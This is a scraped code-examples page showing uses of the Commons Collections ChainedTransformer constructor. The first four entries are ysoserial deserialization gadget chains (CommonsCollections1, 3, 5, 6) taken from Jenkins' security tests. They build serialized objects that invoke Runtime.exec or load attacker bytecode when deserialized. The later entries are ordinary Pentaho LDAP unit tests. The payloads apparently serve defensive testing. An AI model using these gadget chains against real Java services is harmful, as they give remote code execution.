List of usage examples for org.apache.commons.collections.functors ChainedTransformer ChainedTransformer
public ChainedTransformer(Transformer[] transformers)
From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections3.java
public Object getObject(final String command) throws Exception { Object templatesImpl = Gadgets.createTemplatesImpl(command); // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[] { new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer(new Class[] { Templates.class }, new Object[] { templatesImpl }) }; final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class); final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy); Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain return handler; }
From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections1.java
public InvocationHandler getObject(final String command) throws Exception { final String[] execArgs = new String[] { command }; // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[] { new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class); final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy); Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain return handler; }
From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections5.java
public BadAttributeValueExpException getObject(final String command) throws Exception { final String[] execArgs = new String[] { command }; // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[] { new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); BadAttributeValueExpException val = new BadAttributeValueExpException(null); Field valfield = val.getClass().getDeclaredField("val"); valfield.setAccessible(true);/*from www .j av a 2 s .c o m*/ valfield.set(val, entry); Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain return val; }
From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections6.java
public Serializable getObject(final String command) throws Exception { final String[] execArgs = new String[] { command }; final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; Transformer transformerChain = new ChainedTransformer(transformers); final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); HashSet map = new HashSet(1); map.add("foo"); Field f = null;/*from www .j a v a 2 s . co m*/ try { f = HashSet.class.getDeclaredField("map"); } catch (NoSuchFieldException e) { f = HashSet.class.getDeclaredField("backingMap"); } f.setAccessible(true); HashMap innimpl = (HashMap) f.get(map); Field f2 = null; try { f2 = HashMap.class.getDeclaredField("table"); } catch (NoSuchFieldException e) { f2 = HashMap.class.getDeclaredField("elementData"); } f2.setAccessible(true); Object[] array = (Object[]) f2.get(innimpl); Object node = array[0]; if (node == null) { node = array[1]; } Field keyField = null; try { keyField = node.getClass().getDeclaredField("key"); } catch (Exception e) { keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); } keyField.setAccessible(true); keyField.set(node, entry); return map; }
From source file:org.pentaho.test.platform.plugin.services.security.userrole.ldap.DefaultLdapUserRoleListServiceTest.java
/** * Search for all roles (aka authorities) starting at <code>ou=roles</code>, looking for objects with * <code>objectClass=organizationalRole</code>, and returning the <code>cn</code> attribute. *//*from w w w. j ava 2 s.co m*/ @Test public void testGetAllAuthorities1() { SearchControls con1 = new SearchControls(); con1.setReturningAttributes(new String[] { "cn" }); //$NON-NLS-1$ LdapSearchParamsFactory paramsFactory = new LdapSearchParamsFactoryImpl("ou=roles", //$NON-NLS-1$ "(objectClass=organizationalRole)", con1); //$NON-NLS-1$ Transformer one = new SearchResultToAttrValueList("cn"); //$NON-NLS-1$ Transformer two = new StringToGrantedAuthority(); Transformer[] transformers = { one, two }; Transformer transformer = new ChainedTransformer(transformers); LdapSearch rolesSearch = new GenericLdapSearch(getContextSource(), paramsFactory, transformer); DefaultLdapUserRoleListService userRoleListService = getDefaultLdapUserRoleListService(); userRoleListService.setAllAuthoritiesSearch(rolesSearch); List res = userRoleListService.getAllRoles(); assertTrue(res.contains("ROLE_CTO")); //$NON-NLS-1$ assertTrue(res.contains("ROLE_CEO")); //$NON-NLS-1$ if (logger.isDebugEnabled()) { logger.debug("results of getAllAuthorities1(): " + res); //$NON-NLS-1$ } }
From source file:org.pentaho.test.platform.plugin.services.security.userrole.ldap.DefaultLdapUserRoleListServiceTest.java
@Test public void testGetAllAuthorities1ForTenant() { ITenant defaultTenant = new Tenant("/pentaho/tenant0", true); login("suzy", defaultTenant); SearchControls con1 = new SearchControls(); con1.setReturningAttributes(new String[] { "cn" }); //$NON-NLS-1$ LdapSearchParamsFactory paramsFactory = new LdapSearchParamsFactoryImpl("ou=roles", //$NON-NLS-1$ "(objectClass=organizationalRole)", con1); //$NON-NLS-1$ Transformer one = new SearchResultToAttrValueList("cn"); //$NON-NLS-1$ Transformer two = new StringToGrantedAuthority(); Transformer[] transformers = { one, two }; Transformer transformer = new ChainedTransformer(transformers); LdapSearch rolesSearch = new GenericLdapSearch(getContextSource(), paramsFactory, transformer); DefaultLdapUserRoleListService userRoleListService = getDefaultLdapUserRoleListService(); userRoleListService.setAllAuthoritiesSearch(rolesSearch); List res = userRoleListService.getAllRoles(defaultTenant); assertTrue(res.contains("ROLE_CTO")); //$NON-NLS-1$ assertTrue(res.contains("ROLE_CEO")); //$NON-NLS-1$ if (logger.isDebugEnabled()) { logger.debug("results of getAllAuthorities1(): " + res); //$NON-NLS-1$ }//from www. j a v a 2 s . c om try { userRoleListService.getAllRoles(new Tenant("/pentaho", true)); } catch (UnsupportedOperationException uoe) { assertNotNull(uoe); } }
From source file:org.pentaho.test.platform.plugin.services.security.userrole.ldap.DefaultLdapUserRoleListServiceTest.java
/** * Same as above except sorted./* w ww. j a va 2 s. c o m*/ */ @Test public void testGetAllAuthorities1Sorted() { SearchControls con1 = new SearchControls(); con1.setReturningAttributes(new String[] { "cn" }); //$NON-NLS-1$ LdapSearchParamsFactory paramsFactory = new LdapSearchParamsFactoryImpl("ou=roles", //$NON-NLS-1$ "(objectClass=organizationalRole)", con1); //$NON-NLS-1$ Transformer one = new SearchResultToAttrValueList("cn"); //$NON-NLS-1$ Transformer two = new StringToGrantedAuthority(); Transformer[] transformers = { one, two }; Transformer transformer = new ChainedTransformer(transformers); LdapSearch rolesSearch = new GenericLdapSearch(getContextSource(), paramsFactory, transformer); DefaultLdapUserRoleListService userRoleListService = getDefaultLdapUserRoleListService(); userRoleListService.setAllAuthoritiesSearch(rolesSearch); userRoleListService.setRoleComparator(new DefaultRoleComparator()); List res = userRoleListService.getAllRoles(); assertTrue(res.contains("ROLE_CTO")); //$NON-NLS-1$ assertTrue(res.contains("ROLE_CEO")); //$NON-NLS-1$ assertTrue(res.indexOf("ROLE_ADMINISTRATOR") < res.indexOf("ROLE_DEV")); if (logger.isDebugEnabled()) { logger.debug("results of getAllAuthorities1Sorted(): " + res); //$NON-NLS-1$ } }
From source file:org.pentaho.test.platform.plugin.services.security.userrole.ldap.DefaultLdapUserRoleListServiceTest.java
/** * Search for all roles (aka authorities) starting at <code>ou=groups</code>, looking for objects with * <code>objectClass=groupOfUniqueNames</code>, and returning the <code>cn</code> attribute. *//*from w ww . j av a2 s .c om*/ @Test public void testGetAllAuthorities2() { SearchControls con1 = new SearchControls(); con1.setReturningAttributes(new String[] { "cn" }); //$NON-NLS-1$ LdapSearchParamsFactory paramsFactory = new LdapSearchParamsFactoryImpl("ou=groups", //$NON-NLS-1$ "(objectClass=groupOfUniqueNames)", con1); //$NON-NLS-1$ Transformer one = new SearchResultToAttrValueList("cn"); //$NON-NLS-1$ Transformer two = new StringToGrantedAuthority(); Transformer[] transformers = { one, two }; Transformer transformer = new ChainedTransformer(transformers); LdapSearch rolesSearch = new GenericLdapSearch(getContextSource(), paramsFactory, transformer); DefaultLdapUserRoleListService userRoleListService = getDefaultLdapUserRoleListService(); userRoleListService.setAllAuthoritiesSearch(rolesSearch); List res = userRoleListService.getAllRoles(); assertTrue(res.contains("ROLE_SALES")); //$NON-NLS-1$ assertTrue(res.contains("ROLE_MARKETING")); //$NON-NLS-1$ if (logger.isDebugEnabled()) { logger.debug("results of getAllAuthorities2(): " + res); //$NON-NLS-1$ } }
From source file:org.pentaho.test.platform.plugin.services.security.userrole.ldap.DefaultLdapUserRoleListServiceTest.java
/** * Union the results of two different searches. * <ul>//ww w. j a v a 2 s.com * <li>Search 1: Search for all roles (aka authorities) starting at <code>ou=groups</code>, looking for objects with * <code>objectClass=groupOfUniqueNames</code>, and returning the <code>cn</code> attribute.</li> * <li>Search 2: Search for all roles (aka authorities) starting at <code>ou=roles</code>, looking for objects with * <code>objectClass=organizationalRole</code>, and returning the <code>cn</code> attribute.</li> * </ul> */ @Test public void testGetAllAuthorities3() throws Exception { SearchControls con1 = new SearchControls(); con1.setReturningAttributes(new String[] { "cn" }); //$NON-NLS-1$ LdapSearchParamsFactory paramsFactory = new LdapSearchParamsFactoryImpl("ou=roles", //$NON-NLS-1$ "(objectClass=organizationalRole)", con1); //$NON-NLS-1$ Transformer one = new SearchResultToAttrValueList("cn"); //$NON-NLS-1$ Transformer two = new StringToGrantedAuthority(); Transformer[] transformers = { one, two }; Transformer transformer = new ChainedTransformer(transformers); LdapSearch rolesSearch = new GenericLdapSearch(getContextSource(), paramsFactory, transformer); SearchControls con2 = new SearchControls(); con1.setReturningAttributes(new String[] { "cn" }); //$NON-NLS-1$ LdapSearchParamsFactory paramsFactory2 = new LdapSearchParamsFactoryImpl("ou=groups", //$NON-NLS-1$ "(objectClass=groupOfUniqueNames)", con2); //$NON-NLS-1$ Transformer oneB = new SearchResultToAttrValueList("cn"); //$NON-NLS-1$ Transformer twoB = new StringToGrantedAuthority(); Transformer[] transformers2 = { oneB, twoB }; Transformer transformer2 = new ChainedTransformer(transformers2); LdapSearch rolesSearch2 = new GenericLdapSearch(getContextSource(), paramsFactory2, transformer2); Set searches = new HashSet(); searches.add(rolesSearch); searches.add(rolesSearch2); UnionizingLdapSearch unionSearch = new UnionizingLdapSearch(searches); DefaultLdapUserRoleListService userRoleListService = getDefaultLdapUserRoleListService(); userRoleListService.setAllAuthoritiesSearch(unionSearch); List res = userRoleListService.getAllRoles(); assertTrue(res.contains("ROLE_DEVMGR")); //$NON-NLS-1$ assertTrue(res.contains("ROLE_DEVELOPMENT")); //$NON-NLS-1$ if (logger.isDebugEnabled()) { logger.debug("results of getAllAuthorities3(): " + res); //$NON-NLS-1$ } }
From source file:org.pentaho.test.platform.plugin.services.security.userrole.ldap.DefaultLdapUserRoleListServiceTests.java
/** * Search for all roles (aka authorities) starting at <code>ou=roles</code>, looking for objects with * <code>objectClass=organizationalRole</code>, and returning the <code>cn</code> attribute. *///w ww. j a v a 2 s .co m @Test public void testGetAllAuthorities1() { SearchControls con1 = new SearchControls(); con1.setReturningAttributes(new String[] { "cn" }); //$NON-NLS-1$ LdapSearchParamsFactory paramsFactory = new LdapSearchParamsFactoryImpl("ou=roles", //$NON-NLS-1$ "(objectClass=organizationalRole)", con1); //$NON-NLS-1$ Transformer one = new SearchResultToAttrValueList("cn"); //$NON-NLS-1$ Transformer two = new StringToGrantedAuthority(); Transformer[] transformers = { one, two }; Transformer transformer = new ChainedTransformer(transformers); LdapSearch rolesSearch = new GenericLdapSearch(getContextSource(), paramsFactory, transformer); DefaultLdapUserRoleListService userRoleListService = new DefaultLdapUserRoleListService(); userRoleListService.setAllAuthoritiesSearch(rolesSearch); List res = userRoleListService.getAllRoles(); assertTrue(res.contains("ROLE_CTO")); //$NON-NLS-1$ assertTrue(res.contains("ROLE_CEO")); //$NON-NLS-1$ if (logger.isDebugEnabled()) { logger.debug("results of getAllAuthorities1(): " + res); //$NON-NLS-1$ } }